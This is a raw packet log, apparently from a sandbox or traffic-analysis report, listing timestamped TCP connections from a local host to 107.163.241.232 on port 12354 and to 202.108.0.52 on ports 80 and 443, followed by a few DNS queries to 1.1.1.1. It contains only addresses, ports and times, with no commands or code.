                                              Dec 11, 2024 16:28:15.245908976 CET55203443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:15.431991100 CET5385980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:15.432389021 CET5674880192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:15.554116011 CET8056748202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:15.554209948 CET8053859202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:15.554215908 CET5674880192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:15.554255962 CET5385980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:15.554488897 CET5674880192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:15.675597906 CET8056748202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:15.775511980 CET5559212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:15.775592089 CET5674880192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:15.775674105 CET5578012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:15.776140928 CET5702412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:15.889343977 CET5717212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:15.892606974 CET5717480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:15.896300077 CET1235457024107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:15.896363974 CET5702412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:15.896816969 CET5702412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:16.008753061 CET1235457172107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:16.008832932 CET5717212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:16.009551048 CET5717212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:16.012305975 CET8057174202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:16.012387037 CET5717480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:16.012691975 CET5717480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:16.016046047 CET1235457024107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:16.130398035 CET1235457172107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:16.133729935 CET8057174202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:17.591717958 CET8057174202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:17.591929913 CET5717480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:17.595618010 CET58772443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:17.595645905 CET44358772202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:17.595694065 CET58772443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:17.599040985 CET58772443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:17.599054098 CET44358772202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:18.018764019 CET1235457024107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:18.018821001 CET5702412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:18.019584894 CET5702412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:18.020347118 CET5894212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:18.127376080 CET1235457172107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:18.127449036 CET5717212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:18.145737886 CET1235457024107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:18.145749092 CET1235458942107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:18.145915031 CET5894212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:18.278245926 CET5717212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:18.398493052 CET1235457172107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:18.403424978 CET5894212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:18.523380041 CET1235458942107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:18.708439112 CET5894912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:18.829813004 CET1235458949107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:18.829907894 CET5894912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:18.831192017 CET5894912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:18.951471090 CET1235458949107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:19.291626930 CET44358772202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:19.291703939 CET58772443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:19.292280912 CET44358772202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:19.292330027 CET58772443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:19.295629025 CET58772443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:19.295660019 CET44358772202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:19.295708895 CET58772443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:19.405724049 CET5717480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:19.406006098 CET5949480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:19.525404930 CET8057174202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:19.525480032 CET5717480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:19.526846886 CET8059494202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:19.526916981 CET5949480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:19.527522087 CET5949480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:19.646805048 CET8059494202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:19.790916920 CET5949480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:19.790955067 CET5894212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:19.790993929 CET5894912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:19.791588068 CET5985212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:19.905932903 CET6000180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:19.906908989 CET6000312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:19.913728952 CET1235459852107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:19.913830042 CET5985212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:19.914355040 CET5985212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:20.025654078 CET8060001202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:20.025731087 CET6000180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:20.026429892 CET1235460003107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:20.026482105 CET6000312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:20.029805899 CET6000180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:20.030239105 CET6000312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:20.034282923 CET1235459852107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:20.149739027 CET8060001202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:20.149959087 CET1235460003107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:22.019660950 CET1235459852107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:22.019711018 CET5985212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:22.020529985 CET5985212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:22.020859957 CET6090412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:22.144299030 CET1235459852107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:22.144316912 CET1235460904107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:22.144395113 CET6090412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:22.145262957 CET1235460003107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:22.145302057 CET6000312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:22.146188021 CET6090412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:22.146310091 CET6000312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:22.146903992 CET6093712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:22.168234110 CET8060001202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:22.168286085 CET6000180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:22.173795938 CET60947443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:22.173823118 CET44360947202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:22.173868895 CET60947443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:22.175798893 CET60947443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:22.175807953 CET44360947202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:22.272264957 CET1235460904107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:22.272279024 CET1235460003107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:22.272321939 CET1235460937107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:22.272407055 CET6093712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:22.273523092 CET6093712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:22.396071911 CET1235460937107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:23.802406073 CET6090412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:23.802453041 CET6093712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:23.802484035 CET60947443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:23.804212093 CET6225612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:23.922230005 CET6227212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:23.924823999 CET1235462256107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:23.924962997 CET6225612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:23.925092936 CET6225612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:23.925199986 CET6000180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:23.925436020 CET6227380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:24.047698975 CET1235462272107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:24.047806025 CET6227212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:24.048466921 CET6227212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:24.050812960 CET1235462256107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:24.051069021 CET8062273202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:24.051141977 CET6227380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:24.051208973 CET8060001202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:24.051253080 CET6000180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:24.051661015 CET6227380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:24.171410084 CET1235462272107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:24.173826933 CET8062273202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:25.626863003 CET8062273202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:25.626914024 CET6227380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:25.630521059 CET63726443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:25.630546093 CET44363726202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:25.631001949 CET63726443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:25.631871939 CET63726443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:25.631886959 CET44363726202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:25.875725985 CET44363726202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:25.881853104 CET63911443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:25.881874084 CET44363911202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:25.882103920 CET63911443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:25.895504951 CET63911443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:25.895520926 CET44363911202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:26.316520929 CET1235462256107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:26.316611052 CET6225612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:26.320849895 CET6225612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:26.321175098 CET6427012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:26.323133945 CET1235462272107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:26.324476957 CET6227212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:26.324845076 CET6227212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:26.435189009 CET1235462256107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:26.435266018 CET6225612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:26.435903072 CET6440612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:26.441030025 CET1235462256107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:26.441531897 CET1235464270107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:26.442634106 CET6427012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:26.443053007 CET6427012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:26.445302963 CET1235462272107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:26.556154013 CET1235464406107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:26.556269884 CET6440612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:26.564084053 CET1235464270107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:26.564105988 CET1235464270107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:26.582462072 CET6440612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:26.583228111 CET6454612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:26.675817013 CET1235464406107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:26.675909996 CET6440612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:26.678349972 CET6440612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:26.700890064 CET6471112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:26.703377962 CET1235464406107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:26.703391075 CET1235464546107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:26.703455925 CET6454612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:26.704194069 CET6454612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:26.795850992 CET1235464406107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:26.798912048 CET1235464406107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:26.820411921 CET1235464711107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:26.820473909 CET6471112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:26.821213961 CET6471112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:26.823270082 CET1235464546107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:26.823345900 CET6454612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:26.823496103 CET6454612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:26.823529005 CET1235464546107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:26.823823929 CET6486812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:26.940043926 CET1235464711107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:26.940104961 CET6471112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:26.940473080 CET1235464711107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:26.942557096 CET1235464546107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:26.942776918 CET1235464546107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:26.943054914 CET1235464868107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:26.943120003 CET6486812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:26.961775064 CET6471112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:26.962856054 CET6486812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:26.969093084 CET6499012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:27.059534073 CET1235464711107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:27.062978029 CET1235464868107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:27.063030005 CET6486812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:27.063303947 CET6486812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:27.079539061 CET6510112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:27.081310034 CET1235464711107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:27.083686113 CET1235464868107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:27.089359999 CET1235464990107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:27.089417934 CET6499012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:27.091109037 CET6499012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:27.184281111 CET1235464868107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:27.185935020 CET1235464868107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:27.199187994 CET1235465101107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:27.199259043 CET6510112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:27.199979067 CET6510112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:27.209191084 CET1235464990107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:27.209280968 CET6499012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:27.209484100 CET6499012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:27.209939957 CET6516812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:27.211383104 CET1235464990107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:27.318865061 CET1235465101107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:27.318917990 CET6510112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:27.319267035 CET6510112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:27.319354057 CET1235465101107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:27.326160908 CET6525312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:27.328705072 CET1235464990107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:27.329076052 CET1235464990107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:27.330997944 CET1235465168107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:27.331090927 CET6516812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:27.331526041 CET6516812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:27.438250065 CET1235465101107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:27.439142942 CET1235465101107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:27.445904970 CET1235465253107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:27.446002960 CET6525312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:27.452903986 CET1235465168107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:27.459791899 CET6525312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:27.579087973 CET1235465253107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:27.579099894 CET1235465253107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:27.579142094 CET6525312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:27.579855919 CET6525312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:27.580564976 CET6542512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:27.701267958 CET1235465253107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:27.702596903 CET1235465253107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:27.702605963 CET1235465425107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:27.702711105 CET6542512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:27.703543901 CET6542512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:27.816637993 CET6542512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:27.816744089 CET63911443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:27.816773891 CET6516812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:27.822448969 CET1235465425107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:27.822490931 CET6542512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:27.823215961 CET1235465425107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:27.836549044 CET6552812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:27.955966949 CET1235465528107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:27.956043005 CET6552812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:28.001575947 CET6552812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:28.122602940 CET1235465528107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:28.149401903 CET6553312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:28.149605989 CET6227380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:28.149908066 CET6553480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:28.268951893 CET1235465533107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:28.269412041 CET8062273202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:28.269423962 CET8065534202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:28.269543886 CET6227380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:28.269563913 CET6553312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:28.273351908 CET6553480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:28.408266068 CET8065534202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:28.412322044 CET6553480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:28.508908987 CET6553312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:28.509092093 CET6553480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:28.509370089 CET6553480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:28.628777027 CET1235465533107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:28.628793001 CET8065534202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:28.629087925 CET8065534202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:29.128537893 CET4915580192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:29.247875929 CET8049155202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:29.247973919 CET4915580192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:29.274281979 CET4915580192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:29.368297100 CET8049155202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:29.368374109 CET4915580192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:29.393870115 CET8049155202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:29.408812046 CET4915580192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:29.565054893 CET4915980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:29.614195108 CET8049155202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:29.614770889 CET8049155202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:29.687099934 CET8049159202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:29.687179089 CET4915980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:29.706566095 CET4915980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:29.827297926 CET8049159202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:30.066242933 CET1235465528107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:30.066400051 CET6552812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:30.101090908 CET6552812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:30.101533890 CET4918612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:30.220515013 CET1235465528107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:30.220835924 CET1235449186107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:30.221043110 CET4918612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:30.241673946 CET4918612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:30.361246109 CET1235449186107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:30.404557943 CET1235465533107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:30.404747963 CET6553312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:30.409928083 CET6553312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:30.410784960 CET4918812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:30.529211044 CET1235465533107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:30.530057907 CET1235449188107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:30.530157089 CET4918812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:30.562314034 CET4918812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:30.649734020 CET1235449188107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:30.649808884 CET4918812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:30.680437088 CET4918812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:30.681449890 CET4919112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:30.681734085 CET1235449188107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:30.769154072 CET1235449188107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:30.799628973 CET1235449188107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:30.801213980 CET1235449191107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:30.801276922 CET4919112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:30.802567005 CET4919112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:30.921232939 CET1235449191107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:30.921313047 CET4919112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:30.921678066 CET4919112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:30.922061920 CET4935312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:30.922118902 CET1235449191107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:31.040621042 CET1235449191107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:31.040859938 CET1235449191107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:31.041480064 CET1235449353107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:31.041538000 CET4935312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:31.042021990 CET4935312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:31.162334919 CET1235449353107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:31.162394047 CET4935312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:31.162642956 CET1235449353107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:31.281829119 CET1235449353107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:31.283951044 CET8049159202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:31.284012079 CET4915980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:32.331649065 CET1235449186107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:32.331815958 CET4918612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:32.368839025 CET4918612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:32.488276958 CET1235449186107.163.241.232192.168.2.4

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 11, 2024 16:24:30.774204969 CET5429553192.168.2.41.1.1.1
                                              Dec 11, 2024 16:24:30.911444902 CET53542951.1.1.1192.168.2.4
                                              Dec 11, 2024 16:24:35.091752052 CET6170253192.168.2.41.1.1.1
                                              Dec 11, 2024 16:24:35.229712963 CET53617021.1.1.1192.168.2.4
                                              Dec 11, 2024 16:24:37.529467106 CET5479153192.168.2.41.1.1.1
                                              Dec 11, 2024 16:24:37.668656111 CET53547911.1.1.1192.168.2.4
                                              Dec 11, 2024 16:24:40.168365002 CET5843853192.168.2.41.1.1.1
                                              Dec 11, 2024 16:24:40.304883957 CET53584381.1.1.1192.168.2.4
                                              Dec 11, 2024 16:24:45.619990110 CET5638353192.168.2.41.1.1.1
                                              Dec 11, 2024 16:24:45.756824970 CET53563831.1.1.1192.168.2.4
                                              Dec 11, 2024 16:24:50.105223894 CET5278353192.168.2.41.1.1.1
                                              Dec 11, 2024 16:24:50.242305040 CET53527831.1.1.1192.168.2.4
                                              Dec 11, 2024 16:24:55.091144085 CET6522953192.168.2.41.1.1.1
                                              Dec 11, 2024 16:24:55.231453896 CET53652291.1.1.1192.168.2.4
